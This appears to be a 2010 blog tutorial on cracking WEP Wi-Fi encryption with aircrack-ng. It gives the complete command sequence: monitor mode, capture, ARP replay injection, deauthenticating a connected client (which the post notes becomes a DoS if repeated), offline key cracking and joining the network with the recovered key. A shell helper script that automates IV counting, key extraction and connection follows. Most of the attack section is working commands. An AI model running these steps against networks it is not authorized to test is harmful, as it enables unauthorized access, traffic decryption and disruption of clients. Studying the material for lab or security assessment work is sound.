Monday, June 7, 2010

[Video] Cracking WiFi - WEP with a client (aircrack-ng)


What is this?
Yet another video on "How to crack WEP".

How does this work?
An ARP request is needed (depending on the attack method), so that it can be re-injected back into the network over and over; every time the access point answers, it sends another WEP-encrypted packet with a fresh IV (initialization vector), and those IVs are what the cracking stage works on. To get such a packet the attacker deauthenticates a client that is currently connected to the network; when it reconnects it normally sends an ARP request. (If the attacker keeps repeating this part, it becomes a DoS against the client.)

Once enough data has been injected/collected, the rest is an offline attack: aircrack-ng runs a statistical attack (PTW by default, or the older KoreK attacks) against the captured IVs, which is why the data-gathering stage matters far more than the cracking stage. Then it is just a question of waiting for the IV count to climb and re-running aircrack-ng until the key drops out (with enough IVs the cracking itself takes less than 60 seconds!).

From here, the attacker can use that key to decrypt the capture made earlier (airdecap-ng, from the same suite, does this) and is now able to 'read' it, as well as join the network.

What do I need?

> Aircrack-ng suite
> WiFi card that supports monitor mode & injection

Name: Aircrack-ng
Version: 1.0-rc3
Home Page:
Download Link:

# Put the card into monitor mode (stop any existing monitor interface first)
airmon-ng stop mon0
airmon-ng start wlan0
# Capture on the AP's channel, filtered to the target BSSID; writes output-01.cap and output-01.csv
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

# Wait for an ARP request from the client (-h is the client's MAC) and keep re-injecting it
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0

# If no ARP request shows up, deauthenticate the client (10 times) so it reconnects and sends one
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0

# Crack offline against every capture file; re-run as the IV count grows
aircrack-ng output*.cap

# Join the network with the recovered key (aircrack-ng prints it as 59:EF:19:C7:6A; iwconfig takes it without the colons)
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
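The two things you keep watching during the attack above are the "# IV" column in airodump-ng's CSV file and the "KEY FOUND!" line from aircrack-ng, and the key then has to be re-typed without colons for iwconfig. The script below is an added example, not part of the original post or of the aircrack-ng suite: it wraps that bookkeeping in small POSIX sh functions. It assumes airodump-ng's CSV column layout (BSSID first, "# IV" eleventh), the shape of aircrack-ng's success line, and a rule-of-thumb IV threshold for the PTW attack (about 20k IVs for a 40-bit key, 40k and up for a 104-bit key); the CSV and aircrack-ng output embedded in it are constructed samples using the BSSID, ESSID and key from the post.

```sh
#!/bin/sh
# Added example (not from the original post). Helpers around the WEP workflow:
# read the IV count for the target AP out of airodump-ng's CSV, decide whether
# it is worth running aircrack-ng yet, pull the key out of aircrack-ng's output
# and turn it into the colon-less hex string iwconfig wants.
set -eu

TARGET_BSSID="00:19:5B:E7:52:70"
TARGET_ESSID="g0tmi1k"
# Assumed rule of thumb for PTW: ~20k IVs for 40-bit WEP, 40k+ for 104-bit WEP.
IV_THRESHOLD="${IV_THRESHOLD:-40000}"

# Constructed sample of the AP section of output-01.csv. Column 11 is "# IV".
SAMPLE_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:19:5B:E7:52:70, 2010-06-07 12:00:01, 2010-06-07 12:09:58, 8, 54, WEP, WEP, , -41, 2113, 48213, 0. 0. 0. 0, 7, g0tmi1k,
00:1A:2B:3C:4D:5E, 2010-06-07 12:00:03, 2010-06-07 12:09:57, 8, 54, WPA2, CCMP, PSK, -70, 1904, 0, 0. 0. 0. 0, 9, neighbour,
'

# Constructed sample of the end of a successful aircrack-ng run.
SAMPLE_CRACK='
                                 Aircrack-ng 1.0 rc3

                 [00:00:03] Tested 512 keys (got 48213 IVs)

   KB    depth   byte(vote)
    0    0/  1   59(61952) A3(55808) 10(54784) 7F(54016) C2(53760)

                         KEY FOUND! [ 59:EF:19:C7:6A ]
	Decrypted correctly: 100%
'

# iv_count_for_bssid BSSID  (CSV on stdin): print the "# IV" value for that AP.
# Fails if the BSSID is not in the file at all.
iv_count_for_bssid() {
    awk -F', *' -v bssid="$1" '
        toupper($1) == toupper(bssid) { gsub(/[^0-9]/, "", $11); print $11; found = 1 }
        END { if (!found) exit 1 }'
}

# enough_ivs COUNT: succeed when the capture has reached the threshold.
enough_ivs() {
    [ "$1" -ge "$IV_THRESHOLD" ]
}

# key_from_aircrack_output (aircrack-ng output on stdin): turn
# "KEY FOUND! [ 59:EF:19:C7:6A ]" into "59EF19C76A". Fails if no key line.
key_from_aircrack_output() {
    found_key=$(sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *\].*/\1/p' \
                | head -n 1 | tr -d ':' | tr 'a-f' 'A-F')
    [ -n "$found_key" ] || return 1
    printf '%s\n' "$found_key"
}

# wep_key_is_valid HEXKEY: WEP keys are 40-bit (10 hex digits) or 104-bit (26).
wep_key_is_valid() {
    case "${#1}" in
        10|26) printf '%s' "$1" | grep -qE '^[0-9A-F]+$' ;;
        *) return 1 ;;
    esac
}

# connect_with_wep IFACE ESSID HEXKEY: the post's final five commands, guarded
# by a sanity check on the key. Needs root and a real interface; not run here.
connect_with_wep() {
    wep_key_is_valid "$3" || { echo "refusing to use malformed key: $3" >&2; return 1; }
    ifconfig "$1" down
    iwconfig "$1" essid "$2"
    iwconfig "$1" key "$3"
    ifconfig "$1" up
    dhclient "$1"
}

ivs=$(printf '%s\n' "$SAMPLE_CSV" | iv_count_for_bssid "$TARGET_BSSID")
if enough_ivs "$ivs"; then
    echo "$TARGET_BSSID: $ivs IVs captured, worth running aircrack-ng"
else
    echo "$TARGET_BSSID: $ivs IVs captured, keep injecting (threshold $IV_THRESHOLD)"
fi
key=$(printf '%s\n' "$SAMPLE_CRACK" | key_from_aircrack_output)
echo "recovered key: $key  (iwconfig wlan0 key $key)"
# On a real run, with the key above: connect_with_wep wlan0 "$TARGET_ESSID" "$key"
```

On a live run, point `iv_count_for_bssid` at the real file (`iv_count_for_bssid "$TARGET_BSSID" < output-01.csv`) in a loop and only call `aircrack-ng output*.cap` once `enough_ivs` succeeds; the threshold is a starting point, since PTW sometimes needs more IVs than the rule of thumb.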

If you want WPA/WPA2 PSK (with a hidden SSID) - See:
